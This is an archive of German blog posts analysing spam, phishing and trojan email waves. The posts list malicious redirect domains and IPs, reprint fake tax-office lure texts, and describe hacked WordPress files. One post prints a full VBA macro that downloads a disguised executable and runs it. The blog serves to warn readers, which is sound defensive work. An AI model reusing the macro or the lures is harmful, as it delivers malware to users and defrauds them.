Archiv der Kategorie: Trojaner

Jemand hat dir eine Videobotschaft hinterlassen

Angebliche Videobotschaft
Angebliche Videobotschaft

Wenn mir eine Fabienne Schulz eine Videobotschaft schreibt, dann doch bitte nur mir und nicht einem Thorsten W… Außerdem sollte sie wissen, dass Torsten nicht Fabienne Schulz heißt und sie selbst nicht „jemand“ ist, sondern Fabienne Schulz.

Wer in eine solch plumpe Falle tappt, der ist selber schuld.

Finger weg von solchen E-Mails. Insbesondere das der Flash-Player zur Zeit nicht koscher ist. Der Link führt allerdings über mehrere Umleitungen auf einen Fehler 403.

bit.ly/1vw1WmZ => dgnda.enmyas.su => b-unitd.com => tracker.brokeragecapital.com => bigprofitgenerator.com

Gute Nacht

Trojaner: Postal Notification

Trojaner Postal Notification
Trojaner Postal Notification
Die gestern und heute Tage kamen fünf E-Mail mit dem Betreff „Postal Notification“ in meinem Postfach an. Über einen Link soll der Empfänger verleitet werden das Programm notification.exe, das in einem Zip-Archiv notizication.zip enthalten ist, auszuführen. Dazu musste der Empfänger aber das Archiv von einem Server herunterladen. Weniger Tarnung geht kaum noch. In den fünf E-Mails fanden sich vier Server, von denen nur einer den Trojaner heute noch enthielt. ClamAV erkannte die Datei als Win.Trojan.Generickd-1826.

Netter Versuch, aber: Wie viel Erfolg bringt so ein Trojaner?

Die E-Mail wird

  1. von SpamAssassin mit einem Score von 14 und höher als Spam erkannt,
  2. vom Virenscanner nach wenigen Stunden als Trojaner erkannt,
  3. drei von vier Servern sind nach wenigen Stunden enttarnt und bereinigt,
  4. zu guter letzt werden auch noch fünf identische E-Mails ohne Absender an den gleichen Empfänger geschickt.

Wie dumm muss ein Empfänger sein, damit er dieser E-Mail auf den Leim geht?

Wie wäre es, das Datum in der E-Mail auf das aktuelle Datum zu setzen? Eine Information nach 10 Tagen ist doch eher unwahrscheinlich.

(WordPress) Blogs gehackt

Offensichtlich wurden in den letzten Tagen zahlreiche (WordPress-) Blogs gehackt. Gestern und heute erreichten mich ein knappes Dutzend Trojaner unter dem Betreff „Das Problem: Paypal Sperrung“ oder ähnlich. Es waren nicht nur WordPress Blog, doch diese stellten die Mehrheit der betroffenen Seiten. Die E-Mails werden von SpamAssassin sehr zuverlässig als Spam erkannt. Die Seiten, auf die in den E-Mails verlinkt wird, werden allerdings alle auf Google oder eine Fehlerseite umgeleitet. Damit bekomme ich den Trojaner leider nicht in meine Finger. Schade.

Der häufigste Dateiname ist sysre.php. In zwei Fällen hieß die Datei sysresev2.php. Es ist sicher keine schlechte Idee, den eigenen Server nach den Dateien zu durchsuchen.

Zum Schluss ein Beispiel für die E-Mails:
(WordPress) Blogs gehackt weiterlesen

SPAM: Ihr Finanzamt – ELSTER.DE

Gestern waren einige E-Mails im Postfach, die angeblich vom Finanzamt stammen. Ich habe zwei verschiedene Texte gefunden. Gemein ist allem Mails, dass sie einen Anhang mit Namen Erklarung09201429.zip enthalten, wobei die Zahl differieren kann. Das Zip-Archiv ist jedoch zerstört. Bei mir zeigt ark ein leeres Inhaltsverzeichnis an und unzip -l meldet:

End-of-central-directory signature not found. Either this file is not
a zipfile, or it constitutes one disk of a multi-part archive. In the
latter case the central directory and zipfile comment will be found on
the last disk(s) of this archive.

Damit ist der Trojaner soweit ich es beurteilen kann wirkungslos. Es sein denn, er nutzt eine Sicherheitslücke bei ZIP-Dateien unter Windows aus.

Ansonsten nichts neues. Hier noch der Text der E-Mails.

Sehr geehrte Damen und Herren,

USt.-IdentNr.: DE13592

Wir laden alle natürlichen und juristischen Personen für die Überprüfung durch und folgen Sie den Anweisungen des Inland Revenue (angebracht).

Ihre Datei finden Sie als D0C Datei im Anhang dieser E-Mail Folgen Sie einfach der Beschilderung zu vermeiden, sich als Person „in Gefahr“ nach dem ersten Test berichtet.

Material für die Konsultation (MR) ist vor allem für diejenigen, die Finanzdienstleistungen nutzen zu empfehlen (zB. Internet-Banking).

Sollten Sie die Daten nicht abholen, so werden diese nach 6 Monaten automatisch gelöscht.

Dies ist eine automatisch generierte E-Mail – bitte antworten Sie nicht an diese Mailadresse.

Mit freundlichen Grüßen

Ihr Finanzamt / Ihre Steuerverwaltung

HINWEIS:
Sie erhalten diese E-Mail, weil Sie bei der Datenübermittlung z.B. Ihrer Steuererklaerung die Mailbenachrichtigung auf diese E-Mailadresse gewünscht haben.
Bei Steuerbescheiden ist allein die Papierausfertigung rechtlich relevant.

Sehr geehrte Damen und Herren, irgendwas@example.com.

Wir laden alle natürlichen und juristischen Personen für die Überprüfung durch und folgen Sie den Anweisungen des Inland Revenue.

Folgen Sie einfach der Beschilderung zu vermeiden, sich als Person „in Gefahr“ nach dem ersten Test berichtet.

Material für die Konsultation (MR) ist vor allem für diejenigen, die Finanzdienstleistungen nutzen zu empfehlen (zB. Internet-Banking).

——– Ihre Datei finden Sie als D0C-Datei im Anhang dieser E-Mail ——–

Sollten Sie die Daten nicht abholen, so werden diese nach 6 Monaten automatisch gelöscht.
Dies ist eine automatisch generierte E-Mail – bitte antworten Sie nicht an diese Mailadresse.

IdentNr: 4008371707
Mit freundlichen Grüßen
Ihr Finanzamt / Ihre Steuerverwaltung
elster.de

Neuer MS-Word Trojaner

Erste Seite des MS-Word Trojaners
Erste Seite des MS-Word Trojaners
Heute habe ich zahlreichen E-Mails mit einem neuen MS-Word Trojaner erhalten. Entweder konnte ich das Dokument direkt herunterladen, oder es war in einer Zip-Datei eingebunden. Die älteste E-Mail ist von heute 8:32 MESZ.

Betreff Zeilen sind beispielsweise:

  1. The answer from the forum id 56681472642
  2. Re: Erforderliche Dokumentation #454012
  3. Die Anfrage ist erfolgreich abgeschlossen

Die Nummern können dabei durchaus variieren. Auch wird die Schadsoftware über zahlreiche gehackte Server bereitgestellt.

Die Dateien heißen Dokumentation.zip, Abschluss.Doc, oder Die_Anforderung.zip. Teilweise wird dem Downloadlink auch die E-Mailadresse des Adressaten angefügt. Z.B. …/Dokumentation.zip?posnmaster@example.com. Die Datenbank der E-Mail-Adressen, die die Kriminellen verwenden, ist sehr schlecht. Für eine meiner Domains werden Adressen genutzt, die ich nie verwendet habe. Wie hier zu sehen posnmaster statt postmaster.

Sichtbar gemachter Beginn des Programmcodes des Trojaners.
Sichtbar gemachter Beginn des Programmcodes des Trojaners.

Das Word-Dokument enthält Hinweise, wie der Empfänger die Makro-Sicherheit ändern muss, damit der Trojaner funktioniert. Netter Trick. Im hinteren Teil ist der Code des Programms als Text eingetragen, allerdings in weißer Schrift auf weißem Grund, so dass der Programmcode auf den ersten Blick nicht erkennbar ist. Das Dokument scheint nur unsinnig viele leere Seiten zu enthalten.

Die Subroutinen des Trojaners ist stärker obfuskiert als bei den bisherigen Makro_Trojaner. Sogar der Text des Dokumentes wird am Ende geändert. Im Kern wird recht umständlich nach einem Marker „XsTSveotalxVWX“ gesucht, der den Beginn des Programmcodes kennzeichnet. Anschließend wird der Code in eine Datei im Userprofile – in einem Fall hgZWJKrXclYjI.exe – gespeichert und anschließend ausgeführt. Einige Seiten werden bereits als gefährliche Seiten erkannt. Die meisten Antiviren-Programme erkennen die Dateien und die Server immer noch nicht als Schadsoftware oder als befallene Seiten.

Hier geht es zu einem Report bei Virustotal.

Gute Nacht.

Trojaner: Keine Minute vergeht in der ich nicht an dich denke

oder ähnlich lauten die Betreff Zeilen einer derzeit laufenden Welle zur Verbreitung von Trojanern. Der Text beschränkt sich auf ein oder zwei Sätze, wie:

Keine Minute vergeht in der ich nicht an dich denke, und darum schenke ich dir meine Liebe, denn ich spür, ich gehör einfach zu dir. Ich lieb dich!

D. Bischof

Angehängt ist ein ZIP-Archiv 4180.zip, in dem sich wiederum ein MS-Word Dokument abactinal642.doc mit einem Makro befindet. In diesem Fall ist nur leicht obfuskiertes Makro, das eine als Bild getarntes Programm als FFFd.COM im Profil des Nutzers abspeichert und aufruft. Den Link im Quelltext habe ich geändert, er funktioniert bereits nicht mehr.

Sub hui()
Dim DMtjPKZbDiINOsDjnWMDQUaGD As String
Dim vNFhXFNV_TueQRFNXVYWLqYTecVHXURZUNBDUyA As Integer
URL = "http://www.example.com/fotos/rollover5.jpg"
DMtjPKZbDiINOsDjnWMDQUaGD = Environ("USERPROFILE")
Dim lOMwCMuTOYqPBHJNCl: Set lOMwCMuTOYqPBHJNCl = CreateObject("Microsoft.XMLHTTP")
Dim CSGDWYMVOOBASEd: Set CSGDWYMVOOBASEd = CreateObject("Adodb.Stream")
lOMwCMuTOYqPBHJNCl.Open "GET", URL, False
lOMwCMuTOYqPBHJNCl.Send
With CSGDWYMVOOBASEd
.Type = 1
.Open
.write lOMwCMuTOYqPBHJNCl.responseBody
.SaveToFile DMtjPKZbDiINOsDjnWMDQUaGD & "\FFFd.COM", 2
End With
Shell DMtjPKZbDiINOsDjnWMDQUaGD & "\FFFd.COM"
End Sub

Pishing: Sparkasse Online-Banking – Kundendienstes-Sicherheits-update

Unter der Adresse spkass.worldnet.us/update/ (IP: 94.249.139.6) ist zur Zeit wieder eine Sparkassen Online Banking Pishing Seite aktiv. Leider erkennen dies zur Zeit nur 3 von 53 Virenscannern. Über diese Mails habe ich bereits vor gut einem Jahr berichtet, deshalb erspare ich mir weitere Ausführungen zur Mail. Es hat sich im Prinzip nichts geändert.

Glücklicherweise hat jemand diesen Versuch schon erkannt und die Seite entfernt / umgelenkt.

Update: 27. Juni 2014
Für die ausgefallene Seite gibt es nun einen Ersatz unter: skk-54278bf4a28221d672.yolasite.com, aber auch diese ist nicht mehr verfügbar.

skk-54278bf4a28221d672.yolasite.com is an alias for ddos-1476621086.us-east-1.elb.amazonaws.com.
ddos-1476621086.us-east-1.elb.amazonaws.com has address 54.243.34.189
ddos-1476621086.us-east-1.elb.amazonaws.com has address 54.235.94.176

Trojaner: Fax sendebericht

Angeblicher Fax- Sendebericht (Screenshot)
Angeblicher Fax- Sendebericht
Heute versuchen es die Verbrecher wieder mit angeblichen Fax Nachrichten. Bei mir ging eine E-Mail mit dem Titel „Fax sendebericht“ ein. Die Mail enthält zwar keinen Anhang, aber einen Link auf eine Zip-Datei, die das Opfer herunterladen soll. Der Link „http://myflaps.com/fire/mehalu.php?fax=…&hash=…“ dürfte einen Schlüssel auf eine Adressdatenbank enthält, so dass die Verbrecher verfolgen können, wer die Datei herunterlädt.

Trojaner: Fax sendebericht weiterlesen